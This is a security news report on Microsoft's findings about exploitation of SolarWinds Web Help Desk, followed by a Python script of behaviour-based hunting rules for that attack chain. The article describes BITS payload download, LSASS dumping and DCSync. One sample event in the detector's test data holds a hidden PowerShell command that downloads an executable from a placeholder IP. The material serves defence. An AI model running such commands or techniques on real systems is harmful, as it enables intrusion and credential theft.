SolarWinds Web Help Desk Exploited for RCE in Multi-Stage Attacks on Exposed Servers
#Vulnerabilities

Security Reporter

Microsoft warns of active exploitation of SolarWinds Web Help Desk vulnerabilities allowing attackers to achieve remote code execution and move laterally across networks to compromise high-value assets.

Microsoft has revealed a concerning multi-stage intrusion campaign targeting internet-exposed SolarWinds Web Help Desk (WHD) instances, allowing threat actors to achieve initial access and move laterally across organizational networks to compromise high-value assets.

Vulnerability Details

The attacks, which occurred in December 2025, exploited vulnerabilities in SolarWinds WHD that allow unauthenticated remote code execution. Microsoft's Defender Security Research Team could not definitively confirm which specific CVE was used; the candidates are:

  • CVE-2025-40551 (CVSS 9.8) - Untrusted data deserialization vulnerability
  • CVE-2025-40536 (CVSS 8.1) - Security control bypass vulnerability
  • CVE-2025-26399 (CVSS 9.8) - Previously patched untrusted data deserialization flaw

Last week, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-40551 to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. Federal Civilian Executive Branch agencies were ordered to apply fixes by February 6, 2026.

Attack Chain Analysis

According to Microsoft researchers Sagar Patil, Hardik Suri, Eric Hopper, and Kajhon Soyini, successful exploitation of exposed WHD instances allowed attackers to achieve unauthenticated remote code execution and run arbitrary commands within the WHD application context.

Initial Compromise

"Upon successful exploitation, the compromised service of a WHD instance spawned PowerShell to leverage BITS [Background Intelligent Transfer Service] for payload download and execution," the researchers noted.

Lateral Movement and Persistence

Once inside, the threat actors relied on a mix of legitimate tooling and living-off-the-land techniques to establish persistence and move laterally:

  1. Legitimate Tool Abuse: Downloaded components of Zoho ManageEngine, a legitimate remote monitoring and management (RMM) product, to retain persistent remote control without dropping obvious malware

  2. Domain Reconnaissance: Enumerated sensitive domain users and groups, including Domain Admins, to identify targets for privilege escalation

  3. Multiple Persistence and Credential-Theft Mechanisms:

    • Established reverse SSH and RDP access
    • Attempted to create scheduled tasks that launch QEMU virtual machines under the SYSTEM account at startup
    • Used DLL side-loading: a copy of "wab.exe" (the Windows Address Book executable) was made to load a rogue "sspicli.dll", which dumped LSASS memory to harvest credentials

  4. Domain Compromise: In at least one case, conducted DCSync attacks, abusing the Directory Replication Service protocol to impersonate a Domain Controller and request account password hashes from Active Directory

Security Recommendations

Microsoft's guidance focuses on closing the initial access vector and on evicting the persistence and lateral-movement tooling described above.

Immediate Actions

  • Keep WHD instances updated with the latest security patches, and review whether the instance needs to be reachable from the internet at all
  • Identify and remove any unauthorized RMM tools (in this campaign, Zoho ManageEngine components)
  • Rotate service and administrative account credentials, treating anything reachable through LSASS dumping or DCSync as exposed
  • Isolate compromised machines to limit the scope of the breach

Long-term Defense Strategy

"This activity reflects a common but high-impact pattern: a single exposed application can provide a path to full domain compromise when vulnerabilities are unpatched or insufficiently monitored," Microsoft stated.

"In this intrusion, attackers relied heavily on living-off-the-land techniques, legitimate administrative tools, and low-noise persistence mechanisms. These tradecraft choices reinforce the importance of defense in depth, timely patching of internet-facing services, and behavior-based detection across identity, endpoint, and network layers."

The campaign highlights the critical importance of securing internet-facing applications, particularly those with privileged access to internal networks. Organizations running SolarWinds WHD should immediately assess their exposure and apply available patches while monitoring for signs of compromise using the techniques described in this analysis.
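As an added example (not code from Microsoft's analysis or from SolarWinds), the rule set below turns the stages of the attack chain above into behaviour-based hunting checks and runs them over constructed event records, covering both the attack chain and the monitoring recommendation. Assumptions, labelled in the code: event field names are modelled loosely on Sysmon and Windows Security log fields (map them to your SIEM's schema), the WHD service image name `whd-service.exe` is a placeholder, and Domain Controller computer accounts are identified by a trailing `$`. The two replication-right GUIDs are the real DS-Replication-Get-Changes and DS-Replication-Get-Changes-All control-access rights that a DCSync request needs.

```python
"""Hunting rules for the WHD intrusion chain: WHD -> PowerShell/BITS, QEMU task
as SYSTEM, wab.exe side-loading sspicli.dll, DCSync by a non-DC account.
Added example, not Microsoft's or SolarWinds' code. Events are plain dicts
with field names modelled on Sysmon / Security log fields (assumption)."""
import re

# Assumption: image name of the WHD service process; set it for your deployment.
WHD_SERVICE_IMAGES = {"whd-service.exe"}
BITS_INDICATORS = re.compile(r"start-bitstransfer|bitsadmin(\.exe)?\b", re.I)
# Control-access-right GUIDs that DCSync exercises (DRS replication).
DRS_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
SYSTEM_SIDS = {"S-1-5-18"}  # NT AUTHORITY\SYSTEM
SYSTEM_DIRS = re.compile(r"^c:\\windows\\(system32|syswow64)\\", re.I)


def basename(path):
    """Last component of a Windows path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def rule_whd_spawns_powershell(ev):
    """Sysmon 1 / Security 4688: WHD service spawning PowerShell, higher if BITS is used."""
    if ev.get("type") != "process_create":
        return None
    if basename(ev["parent_image"]) not in WHD_SERVICE_IMAGES:
        return None
    if basename(ev["image"]) not in {"powershell.exe", "pwsh.exe"}:
        return None
    via_bits = bool(BITS_INDICATORS.search(ev.get("command_line", "")))
    return ("whd_spawned_powershell", "high" if via_bits else "medium")


def rule_qemu_scheduled_task(ev):
    """Security 4698 (simplified fields): scheduled task launching QEMU as SYSTEM at boot."""
    if ev.get("type") != "task_create":
        return None
    if "qemu" not in ev.get("task_command", "").lower():
        return None
    if ev.get("task_user_sid") in SYSTEM_SIDS and ev.get("trigger") == "boot":
        return ("qemu_task_as_system_at_boot", "high")
    return ("qemu_task", "medium")


def rule_wab_sideload(ev):
    """Sysmon 7: wab.exe loading an sspicli.dll that is not the one in System32."""
    if ev.get("type") != "image_load":
        return None
    if basename(ev["image"]) != "wab.exe" or basename(ev["image_loaded"]) != "sspicli.dll":
        return None
    if SYSTEM_DIRS.match(ev["image_loaded"]):
        return None  # the legitimate SSPI client library
    return ("wab_sspicli_sideload", "high")


def rule_dcsync(ev):
    """Security 4662: replication rights exercised by a non-DC account.
    Assumption: DC computer accounts end in '$'; allow-list any service
    accounts (e.g. directory sync agents) that legitimately replicate."""
    if ev.get("type") != "object_access":
        return None
    props = {p.lower() for p in ev.get("properties", [])}
    if not props & DRS_GUIDS:
        return None
    if ev.get("subject_user", "").endswith("$"):
        return None
    return ("dcsync_by_non_dc", "critical")


RULES = [rule_whd_spawns_powershell, rule_qemu_scheduled_task, rule_wab_sideload, rule_dcsync]


def hunt(events):
    """Apply every rule to every event; returns (event id, rule name, severity) tuples."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append((ev["id"], *hit))
    return findings


# Constructed sample telemetry (not real logs): one event per stage plus benign noise.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process_create", "parent_image": r"C:\Program Files\WHD\whd-service.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell -nop -w hidden Start-BitsTransfer -Source http://198.51.100.7/p -Destination C:\Users\Public\a.exe"},
    {"id": 2, "type": "task_create", "task_name": "Updater", "trigger": "boot", "task_user_sid": "S-1-5-18",
     "task_command": r"C:\ProgramData\q\qemu-system-x86_64.exe -hda disk.qcow2"},
    {"id": 3, "type": "image_load", "image": r"C:\Users\Public\wab.exe", "image_loaded": r"C:\Users\Public\sspicli.dll"},
    {"id": 4, "type": "image_load", "image": r"C:\Program Files\Windows Mail\wab.exe",
     "image_loaded": r"C:\Windows\System32\sspicli.dll"},  # benign: real DLL from System32
    {"id": 5, "type": "object_access", "subject_user": "svc_backup",
     "properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
    {"id": 6, "type": "object_access", "subject_user": "DC01$",
     "properties": ["1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},  # benign: DC-to-DC replication
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

Each rule keys on the relationship that the legitimate tool never has on its own: the help-desk service has no reason to spawn PowerShell, a help-desk server has no reason to boot a QEMU VM as SYSTEM, wab.exe should only ever resolve sspicli.dll from System32, and only Domain Controllers (and known sync agents) should exercise replication rights. The severity labels are a starting point for triage, not a verdict.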
